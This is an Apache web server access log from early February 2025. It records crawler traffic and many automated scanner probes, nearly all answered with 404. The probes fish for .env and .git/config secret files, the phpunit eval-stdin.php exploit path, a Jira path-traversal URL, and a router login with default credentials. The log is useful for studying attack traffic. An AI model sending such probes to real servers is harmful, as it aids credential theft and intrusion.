212.162.151.158 - - [07/Feb/2025:23:55:19 +0200] "POST /enviroments/.env.production HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [07/Feb/2025:23:57:44 +0200] "POST / HTTP/1.1" 404 198 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.141.215.36 - - [07/Feb/2025:23:57:52 +0200] "POST / HTTP/1.1" 404 198 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
45.141.215.36 - - [07/Feb/2025:23:57:52 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
45.141.215.36 - - [07/Feb/2025:23:58:12 +0200] "GET /.env HTTP/1.1" 404 202 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.141.215.36 - - [07/Feb/2025:23:58:12 +0200] "POST / HTTP/1.1" 404 198 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
87.120.126.60 - - [07/Feb/2025:23:58:20 +0200] "GET /.env HTTP/1.1" 404 202 "-" "fasthttp"
87.120.126.60 - - [07/Feb/2025:23:58:21 +0200] "GET /.env~ HTTP/1.1" 404 203 "-" "fasthttp"
87.120.126.60 - - [07/Feb/2025:23:58:21 +0200] "GET /.env.bak HTTP/1.1" 404 206 "-" "fasthttp"
87.120.126.60 - - [07/Feb/2025:23:58:21 +0200] "GET /.env.backup HTTP/1.1" 404 209 "-" "fasthttp"
87.120.126.60 - - [07/Feb/2025:23:58:21 +0200] "GET /.env.example HTTP/1.1" 404 210 "-" "fasthttp"
87.120.126.60 - - [07/Feb/2025:23:58:21 +0200] "GET /local.env HTTP/1.1" 404 207 "-" "fasthttp"
87.120.126.60 - - [07/Feb/2025:23:58:21 +0200] "GET /backend/.env HTTP/1.1" 404 210 "-" "fasthttp"
87.120.126.60 - - [07/Feb/2025:23:58:45 +0200] "GET /.env HTTP/1.1" 404 202 "-" "fasthttp"
87.120.126.60 - - [07/Feb/2025:23:58:45 +0200] "GET /.env~ HTTP/1.1" 404 203 "-" "fasthttp"
87.120.126.60 - - [07/Feb/2025:23:58:45 +0200] "GET /.env.bak HTTP/1.1" 404 206 "-" "fasthttp"
87.120.126.60 - - [07/Feb/2025:23:58:45 +0200] "GET /.env.backup HTTP/1.1" 404 209 "-" "fasthttp"
87.120.126.60 - - [07/Feb/2025:23:58:45 +0200] "GET /.env.example HTTP/1.1" 404 210 "-" "fasthttp"
87.120.126.60 - - [07/Feb/2025:23:58:45 +0200] "GET /local.env HTTP/1.1" 404 207 "-" "fasthttp"
87.120.126.60 - - [07/Feb/2025:23:58:45 +0200] "GET /backend/.env HTTP/1.1" 404 210 "-" "fasthttp"
80.82.77.202 - - [08/Feb/2025:00:03:46 +0200] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
89.248.174.130 - - [08/Feb/2025:00:06:38 +0200] "\x16\x03\x01" 400 226 "-" "-"
89.248.174.130 - - [08/Feb/2025:00:06:38 +0200] "\x16\x03\x01" 400 226 "-" "-"
89.248.174.130 - - [08/Feb/2025:00:06:38 +0200] "\x16\x03\x01" 400 226 "-" "-"
66.249.79.8 - - [08/Feb/2025:00:06:57 +0200] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.8 - - [08/Feb/2025:00:06:57 +0200] "GET /ar/user/153 HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.53 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.8 - - [08/Feb/2025:00:07:02 +0200] "GET /en HTTP/1.1" 404 200 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.53 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
::1 - - [08/Feb/2025:00:09:46 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [08/Feb/2025:00:09:47 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
185.12.59.118 - - [08/Feb/2025:00:09:48 +0200] "GET / HTTP/1.1" 200 387 "-" "-"
::1 - - [08/Feb/2025:00:09:48 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [08/Feb/2025:00:09:50 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [08/Feb/2025:00:09:53 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
212.162.151.158 - - [08/Feb/2025:00:10:21 +0200] "GET /application/.env HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [08/Feb/2025:00:10:21 +0200] "POST /application/.env HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
::1 - - [08/Feb/2025:00:10:23 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [08/Feb/2025:00:10:24 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [08/Feb/2025:00:10:25 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [08/Feb/2025:00:10:26 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [08/Feb/2025:00:10:27 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [08/Feb/2025:00:10:28 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [08/Feb/2025:00:10:28 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [08/Feb/2025:00:10:29 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [08/Feb/2025:00:10:29 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [08/Feb/2025:00:10:30 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
212.162.151.158 - - [08/Feb/2025:00:13:58 +0200] "GET /core/.env HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [08/Feb/2025:00:13:58 +0200] "POST /core/.env HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
37.139.53.80 - - [08/Feb/2025:00:15:52 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
212.162.151.158 - - [08/Feb/2025:00:17:30 +0200] "GET /apps/.env HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
212.162.151.158 - - [08/Feb/2025:00:17:30 +0200] "POST /apps/.env HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
37.139.53.80 - - [08/Feb/2025:00:19:15 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
212.162.151.158 - - [08/Feb/2025:00:21:10 +0200] "GET /frontend_dev.php/$ HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
141.255.166.90 - - [08/Feb/2025:00:21:20 +0200] "GET / HTTP/1.1" 200 902 "-" "-"
217.160.163.177 - - [08/Feb/2025:00:21:43 +0200] "GET /.env HTTP/1.1" 404 202 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
217.160.163.177 - - [08/Feb/2025:00:21:43 +0200] "POST / HTTP/1.1" 404 198 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.162.151.158 - - [08/Feb/2025:00:24:42 +0200] "GET /debug/default/view?panel=config HTTP/1.1" 404 216 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
198.235.24.55 - - [08/Feb/2025:00:24:49 +0200] "\x16\x03\x01" 400 226 "-" "-"
198.235.24.55 - - [08/Feb/2025:00:24:49 +0200] "\x16\x03\x01" 400 226 "-" "-"
114.119.140.206 - - [08/Feb/2025:00:28:10 +0200] "GET /user/183 HTTP/1.1" 404 206 "http://coursearena.com/user/183" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
212.162.151.158 - - [08/Feb/2025:00:28:16 +0200] "GET /.json HTTP/1.1" 404 203 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.141.215.36 - - [08/Feb/2025:00:28:28 +0200] "GET /.env HTTP/1.1" 404 202 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.141.215.36 - - [08/Feb/2025:00:28:28 +0200] "POST / HTTP/1.1" 404 198 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.141.215.36 - - [08/Feb/2025:00:28:31 +0200] "GET /sendgrid/.env HTTP/1.1" 404 211 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.141.215.36 - - [08/Feb/2025:00:28:35 +0200] "POST / HTTP/1.1" 404 198 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
143.110.252.227 - - [08/Feb/2025:00:36:38 +0200] "HEAD / HTTP/1.1" 200 - "-" "curl/7.88.1"
143.110.252.227 - - [08/Feb/2025:00:36:39 +0200] "GET /assets/plugins/jquery.filer/php/readme.txt HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4859.172 Safari/537.36"
143.110.252.227 - - [08/Feb/2025:00:36:39 +0200] "GET /assets/vendor/jquery.filer/php/readme.txt HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4859.172 Safari/537.36"
143.110.252.227 - - [08/Feb/2025:00:36:40 +0200] "GET /plugins/jquery.filer/php/readme.txt HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4859.172 Safari/537.36"
143.110.252.227 - - [08/Feb/2025:00:36:41 +0200] "GET /assets/admin/bower_components/jquery.filer/php/readme.txt HTTP/1.1" 404 255 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4859.172 Safari/537.36"
143.110.252.227 - - [08/Feb/2025:00:36:42 +0200] "GET /jquery.filer/php/readme.txt HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4859.172 Safari/537.36"
212.162.151.158 - - [08/Feb/2025:00:38:08 +0200] "GET /config.json HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
51.8.102.32 - - [08/Feb/2025:00:38:17 +0200] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
212.162.151.158 - - [08/Feb/2025:00:41:34 +0200] "GET /info.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
112.248.115.168 - - [08/Feb/2025:00:46:57 +0200] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 221 "-" "-"
212.162.151.158 - - [08/Feb/2025:00:51:02 +0200] "GET /phpinfo.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
179.43.160.138 - - [08/Feb/2025:00:53:14 +0200] "GET / HTTP/1.1" 200 380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.162.151.158 - - [08/Feb/2025:00:54:14 +0200] "GET /?phpinfo=1 HTTP/1.1" 200 382 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
114.119.155.58 - - [08/Feb/2025:00:55:31 +0200] "GET /en/portal/checkFavorites/3?t=instructor HTTP/1.1" 404 224 "http://coursearena.com/en/user/3" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
37.139.53.80 - - [08/Feb/2025:00:56:09 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
212.162.151.158 - - [08/Feb/2025:00:57:19 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 215 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
37.139.53.80 - - [08/Feb/2025:00:59:15 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
95.214.55.43 - - [08/Feb/2025:01:01:52 +0200] "GET / HTTP/1.1" 200 382 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
::1 - - [08/Feb/2025:01:07:41 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
193.68.89.10 - - [08/Feb/2025:01:10:09 +0200] "GET / HTTP/1.1" 200 385 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
66.249.66.33 - - [08/Feb/2025:01:12:43 +0200] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.45 - - [08/Feb/2025:01:12:44 +0200] "GET /ads.txt HTTP/1.1" 404 205 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.93.129.190 - - [08/Feb/2025:01:14:44 +0200] "\x16\x03\x01" 400 226 "-" "-"
142.93.129.190 - - [08/Feb/2025:01:14:44 +0200] "GET / HTTP/1.1" 200 902 "-" "-"
142.93.129.190 - - [08/Feb/2025:01:14:44 +0200] "GET / HTTP/1.1" 200 902 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA791371) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3156.98 Mobile Safari/537.3"
142.93.129.190 - - [08/Feb/2025:01:14:44 +0200] "GET /actuator/env HTTP/1.1" 404 210 "-" "Go-http-client/1.1"
142.93.129.190 - - [08/Feb/2025:01:14:44 +0200] "GET /server HTTP/1.1" 404 204 "-" "Go-http-client/1.1"
142.93.129.190 - - [08/Feb/2025:01:14:44 +0200] "GET /.vscode/sftp.json HTTP/1.1" 404 215 "-" "Go-http-client/1.1"
142.93.129.190 - - [08/Feb/2025:01:14:44 +0200] "GET /about HTTP/1.1" 404 203 "-" "Go-http-client/1.1"
142.93.129.190 - - [08/Feb/2025:01:14:44 +0200] "GET /debug/default/view?panel=config HTTP/1.1" 404 216 "-" "Go-http-client/1.1"
142.93.129.190 - - [08/Feb/2025:01:14:44 +0200] "GET /v2/_catalog HTTP/1.1" 404 209 "-" "Go-http-client/1.1"
142.93.129.190 - - [08/Feb/2025:01:14:44 +0200] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 273 "-" "Go-http-client/1.1"
142.93.129.190 - - [08/Feb/2025:01:14:44 +0200] "GET /server-status HTTP/1.1" 404 211 "-" "Go-http-client/1.1"
142.93.129.190 - - [08/Feb/2025:01:14:44 +0200] "GET /login.action HTTP/1.1" 404 210 "-" "Go-http-client/1.1"
142.93.129.190 - - [08/Feb/2025:01:14:44 +0200] "GET /_all_dbs HTTP/1.1" 404 206 "-" "Mozilla/5.0 (l9scan/2.0.532323e2439313e20343e2838313; +https://leakix.net)"
142.93.129.190 - - [08/Feb/2025:01:14:44 +0200] "GET /.DS_Store HTTP/1.1" 404 207 "-" "Go-http-client/1.1"
142.93.129.190 - - [08/Feb/2025:01:14:44 +0200] "GET /.env HTTP/1.1" 404 202 "-" "Go-http-client/1.1"
142.93.129.190 - - [08/Feb/2025:01:14:44 +0200] "GET /.git/config HTTP/1.1" 404 209 "-" "Go-http-client/1.1"
142.93.129.190 - - [08/Feb/2025:01:14:44 +0200] "GET /s/532323e2439313e20343e2838313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 298 "-" "Go-http-client/1.1"
142.93.129.190 - - [08/Feb/2025:01:14:44 +0200] "GET /config.json HTTP/1.1" 404 209 "-" "Go-http-client/1.1"
142.93.129.190 - - [08/Feb/2025:01:14:45 +0200] "GET /telescope/requests HTTP/1.1" 404 216 "-" "Go-http-client/1.1"
142.93.129.190 - - [08/Feb/2025:01:14:45 +0200] "GET /info.php HTTP/1.1" 404 16 "-" "Go-http-client/1.1"
142.93.129.190 - - [08/Feb/2025:01:14:46 +0200] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 200 380 "-" "Go-http-client/1.1"
::1 - - [08/Feb/2025:01:14:47 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [08/Feb/2025:01:14:48 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [08/Feb/2025:01:14:49 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
179.43.160.138 - - [08/Feb/2025:01:17:00 +0200] "GET / HTTP/1.1" 200 380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
::1 - - [08/Feb/2025:01:17:56 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [08/Feb/2025:01:17:57 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [08/Feb/2025:01:17:58 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [08/Feb/2025:01:18:31 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
45.156.129.130 - - [08/Feb/2025:01:20:39 +0200] "GET / HTTP/1.1" 200 382 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
147.185.132.55 - - [08/Feb/2025:01:22:15 +0200] "GET / HTTP/1.0" 200 902 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
78.153.140.149 - - [08/Feb/2025:01:23:56 +0200] "GET /.env HTTP/1.1" 404 202 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
78.153.140.149 - - [08/Feb/2025:01:23:56 +0200] "POST / HTTP/1.1" 404 198 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
114.119.153.188 - - [08/Feb/2025:01:27:37 +0200] "GET /en/course/62 HTTP/1.1" 404 210 "http://coursearena.com/course/62" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
37.139.53.80 - - [08/Feb/2025:01:37:43 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
193.68.89.10 - - [08/Feb/2025:01:38:08 +0200] "GET / HTTP/1.1" 200 383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
51.8.102.230 - - [08/Feb/2025:01:38:14 +0200] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
::1 - - [08/Feb/2025:01:40:21 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [08/Feb/2025:01:40:23 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
3.99.188.60 - - [08/Feb/2025:01:40:48 +0200] "GET /.env HTTP/1.1" 404 202 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.141.215.36 - - [08/Feb/2025:01:41:54 +0200] "GET /.env HTTP/1.1" 404 202 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.141.215.36 - - [08/Feb/2025:01:42:08 +0200] "POST / HTTP/1.1" 404 198 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.141.215.36 - - [08/Feb/2025:01:42:15 +0200] "GET /sendgrid/.env HTTP/1.1" 404 211 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.141.215.36 - - [08/Feb/2025:01:42:23 +0200] "POST / HTTP/1.1" 404 198 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.8.102.213 - - [08/Feb/2025:01:42:56 +0200] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
51.8.102.247 - - [08/Feb/2025:01:47:48 +0200] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
45.141.215.36 - - [08/Feb/2025:01:49:32 +0200] "GET /.env HTTP/1.1" 404 202 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.141.215.36 - - [08/Feb/2025:01:49:34 +0200] "POST / HTTP/1.1" 404 198 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.141.215.36 - - [08/Feb/2025:01:49:36 +0200] "GET /sendgrid/.env HTTP/1.1" 404 211 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.141.215.36 - - [08/Feb/2025:01:49:37 +0200] "POST / HTTP/1.1" 404 198 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
3.99.188.60 - - [08/Feb/2025:01:49:55 +0200] "GET /.env HTTP/1.1" 404 202 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
193.68.89.10 - - [08/Feb/2025:01:56:28 +0200] "GET / HTTP/1.1" 200 384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
176.65.137.206 - - [08/Feb/2025:01:58:41 +0200] "GET /.env HTTP/1.1" 404 202 "-" "Mozilla/5.0 (X11; Linux x86_64)"
